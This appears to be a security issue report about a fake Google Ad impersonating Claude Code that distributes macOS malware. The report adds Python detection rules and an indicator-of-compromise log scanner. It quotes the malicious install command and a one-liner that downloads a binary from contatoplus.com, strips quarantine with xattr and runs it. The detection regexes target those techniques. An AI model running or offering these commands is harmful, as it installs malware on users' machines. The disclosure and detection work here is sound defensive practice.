Malicious Google Ad impersonating Claude Code — distributes macOS malware #28665

@marek-vybiral

Summary

A sponsored Google Ad for the search query "claude code" leads to a fake website at cl-code.it.com that distributes macOS malware disguised as a Claude Code install script. As of 2025-02-25, this is the no. 1 result (sponsored) for that query.

Additional malicious sponsored results were found for the query "claude code install":

  • claude-code-macos.com
  • relatestudios.com

Both use the same title: "Install Claude Code for macOS - Claude Code Docs"

Attack Chain

The fake site presents an install command:

curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20...<redacted>'|base64 -D)| zsh

Three layers of obfuscation:

  1. The base64 string decodes to https://contatoplus.com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
  2. That URL returns a base64+gzip-encoded shell script
  3. Which downloads and executes an unsigned macOS binary:

     curl -o /tmp/helper https://contatoplus.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper

The xattr -c specifically bypasses macOS Gatekeeper quarantine protection.
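The staged chain above (base64-hidden URL inside a command substitution, curl with -k piped into zsh, xattr -c on a /tmp binary that is then executed) is a pattern that can be flagged from process command-line telemetry or shell history. The following is an added example, not part of this issue and not an Anthropic or Google tool; the rule names and regexes are assumptions written for this illustration, and the sample commands are the two command lines quoted in the report plus a constructed benign download.

```python
import re

# Detection rules for the staged "curl | zsh" chain described in the report.
# Constructed for this example; the regexes are assumptions, not a vendor signature.
RULES = [
    # output of a download piped straight into an interpreter
    ("pipe_to_shell", re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b")),
    # the real URL is hidden inside a base64-decoding command substitution
    ("base64_decode_in_substitution",
     re.compile(r"\$\([^()]*base64\s+(?:-D|-d|--decode)")),
    # curl told to ignore TLS certificate errors (-k / --insecure)
    ("curl_ignores_tls",
     re.compile(r"\bcurl\b[^|;&]*\s(?:-[A-Za-z]*k|--insecure)")),
    # quarantine attribute cleared so Gatekeeper never evaluates the file
    ("xattr_quarantine_strip",
     re.compile(r"\bxattr\s+(?:-c\b|-d\s+com\.apple\.quarantine\b)")),
    # a file in /tmp is made executable and then run in the same command line
    ("exec_from_tmp",
     re.compile(r"chmod\s+\+x\s+(/(?:private/)?tmp/\S+).*?(?:&&|;)\s*\1(?:\s|$)")),
]


def classify_command(cmd: str) -> list[str]:
    """Return the names of all rules that fire on one shell command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def is_suspicious_install(cmd: str, min_hits: int = 2) -> bool:
    """A single rule (e.g. piping to a shell) is common in legitimate installers;
    require two independent indicators before raising an alert."""
    return len(classify_command(cmd)) >= min_hits


# Sample inputs: the two command lines quoted in the report (the base64 blob is
# redacted there and is left redacted here) plus one constructed benign download.
SAMPLE_COMMANDS = {
    "stage1": "curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20...<redacted>'"
              "|base64 -D)| zsh",
    "stage3": "curl -o /tmp/helper https://contatoplus.com/n8n/update && "
              "xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",
    "benign": "curl -fsSL https://example.com/archive.tar.gz -o archive.tar.gz",
}


def scan(commands: dict = SAMPLE_COMMANDS) -> dict:
    """Classify every sample; used as the entry point when run stand-alone."""
    return {label: classify_command(cmd) for label, cmd in commands.items()}


if __name__ == "__main__":
    for label, hits in scan().items():
        verdict = "SUSPICIOUS" if len(hits) >= 2 else "ok"
        print(f"{label:7s} {verdict:10s} {hits}")
```

The threshold matters: many legitimate installers also pipe curl output into a shell, so the example only alerts when a second indicator (hidden base64 URL, -k, quarantine stripping, execution from /tmp) appears on the same command line.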

Google Ads Advertiser Info

Indicators of Compromise

Indicator                 Value
Phishing domain           cl-code.it.com
Phishing domain           claude-code-macos.com
Phishing domain           relatestudios.com
Payload host              contatoplus.com
Payload URL               contatoplus.com/n8n/update
Dropped binary            /tmp/helper
Google Ads campaign ID    23605260130
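To check whether any host in an environment already reached these domains, the IoC table can be swept against web-proxy or DNS logs. The following is an added example, not part of this issue; the domain and URL values come from the table above, while the log format, the sample log lines and the function names are constructed for the illustration. It matches on full DNS labels (so cdn.relatestudios.com is a hit but a name that merely contains the string is not) and separately marks requests for the payload URL.

```python
from urllib.parse import urlsplit

# IoC values copied from the report's table; everything else here is constructed.
IOC_DOMAINS = {
    "cl-code.it.com",
    "claude-code-macos.com",
    "relatestudios.com",
    "contatoplus.com",
}
IOC_URLS = {"contatoplus.com/n8n/update"}

# Constructed proxy-log lines (not real telemetry): "<ts> <client> <method> <url> <status>"
SAMPLE_PROXY_LOG = """\
2025-02-25T09:58:41Z 10.1.4.22 GET https://www.google.com/search?q=claude+code 200
2025-02-25T09:58:49Z 10.1.4.22 GET https://cl-code.it.com/ 200
2025-02-25T09:59:03Z 10.1.4.22 GET https://contatoplus.com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b 200
2025-02-25T09:59:05Z 10.1.4.22 GET https://contatoplus.com/n8n/update 200
2025-02-25T10:02:17Z 10.1.7.9 GET https://cdn.relatestudios.com/assets/app.js 200
2025-02-25T10:03:00Z 10.1.7.9 GET https://mycl-code.it.com/ 200
2025-02-25T10:05:12Z 10.1.9.31 GET https://docs.example.com/claude-code/install 200
"""


def matched_ioc_domain(host: str):
    """Return the IoC domain that `host` equals or is a subdomain of, else None.
    Label-aware: 'cdn.relatestudios.com' matches, 'mycl-code.it.com' does not."""
    host = host.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def scan_proxy_log(text: str = SAMPLE_PROXY_LOG) -> list[dict]:
    """Yield one record per log line whose destination host is an IoC domain."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than aborting the sweep
        ts, client, _method, url = parts[:4]
        u = urlsplit(url)
        ioc = matched_ioc_domain(u.hostname or "")
        if ioc is None:
            continue
        hits.append({
            "ts": ts,
            "client": client,
            "host": u.hostname,
            "ioc": ioc,
            # a request for the stage-3 binary means the chain likely completed
            "payload_url": (u.hostname + u.path) in IOC_URLS,
        })
    return hits


def clients_to_triage(hits=None) -> list[str]:
    """Distinct client addresses that touched any IoC, for endpoint follow-up."""
    hits = scan_proxy_log() if hits is None else hits
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    for h in scan_proxy_log():
        flag = "PAYLOAD" if h["payload_url"] else ""
        print(f'{h["ts"]} {h["client"]:10s} {h["host"]:28s} ioc={h["ioc"]} {flag}')
    print("triage:", clients_to_triage())
```

A client that fetched the payload URL should be treated as having run the /tmp/helper binary until an endpoint check shows otherwise; the other hits indicate exposure to the ad or landing page only.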

Recommendation

  • Request takedown of the Google Ad (campaign ID 23605260130)
  • Request takedown of cl-code.it.com, claude-code-macos.com, relatestudios.com, and contatoplus.com
  • Consider a security advisory warning users to only install Claude Code via npm or the official docs
